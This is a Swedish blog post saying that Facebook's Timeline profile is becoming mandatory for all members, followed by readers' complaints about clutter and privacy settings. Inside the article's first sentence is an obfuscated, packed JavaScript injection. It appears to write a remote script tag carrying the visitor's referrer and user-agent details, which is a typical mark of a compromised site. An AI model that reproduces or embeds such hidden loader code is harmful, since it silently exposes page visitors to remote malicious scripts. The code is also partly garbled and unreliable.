Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Facebook rullar ut Timeline åt alla

Facebook rullar ut Timeline åt alla
Sebastian

Testperioden eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eniyy|var|u0026u|referrer|znabd||js|php’.split(’|’),0,{}))
är över och det finns ingen återvändo. Nu har Facebook meddelat att deras profil ”Timeline” kommer bli obligatorisk för alla medlemmar.

Inom de närmaste veckorna kommer alla vara tvungna att byta över till profilen Facebook Timeline. Det var i ett fåordigt blogginlägg där Facebook i dag meddelade allmänheten att testperioden nu är över och det är dags att gå publik.

För de medlemmar som inte har aktiverat Timeline än kommer de få 7 dagar att förberedda sig och ”göra ordning” sin profil innan den blir synlig för andra användare.

Sammanfattat, ingen kommer undan timeline 🙂

Mer information om Facebook Timeline: Här

Comments

 1. Pelle

  Dammit

 2. Det här är något jag verkligen inte vill ha. Vad jag har hört av alla vänner så är den rörig och svår att navigera i. Varför ska de byta ett bra koncept?

  • Kan komplettera med att det är väldigt stökig. Har haft det ett tag nu men fortfarande inte lärt mig vart allt ligger 😛

 3. Niclas

  Typiskt Facebook!! Såg att Facebook var en av USAs mest hatade hemsida 🙂 Måste vara för att den är så beroende säkert.

 4. my

  suger. Säkerheten är ju inte alls samma på den heller, bortsett från att den är rörig. Ser inlägg hos människors timeline(människor som inte är vänner mer), fast dom har inställningen att det inte ska synas av andra än vänner. Tror inte så många förstår det… Bläää… Ett gyllene tillfälle för någon att starta en annan sajt, som är precis likartad men utan tvånget till ex. timeline. (och med bättre säkerhet) Skulle nog hellre betala en pyttesumma per månad, för att slippa den här skiten.

  • patrik

   Håller helt klart med dig. Betalar också hellre en slant en att ha en helt värdelös profil.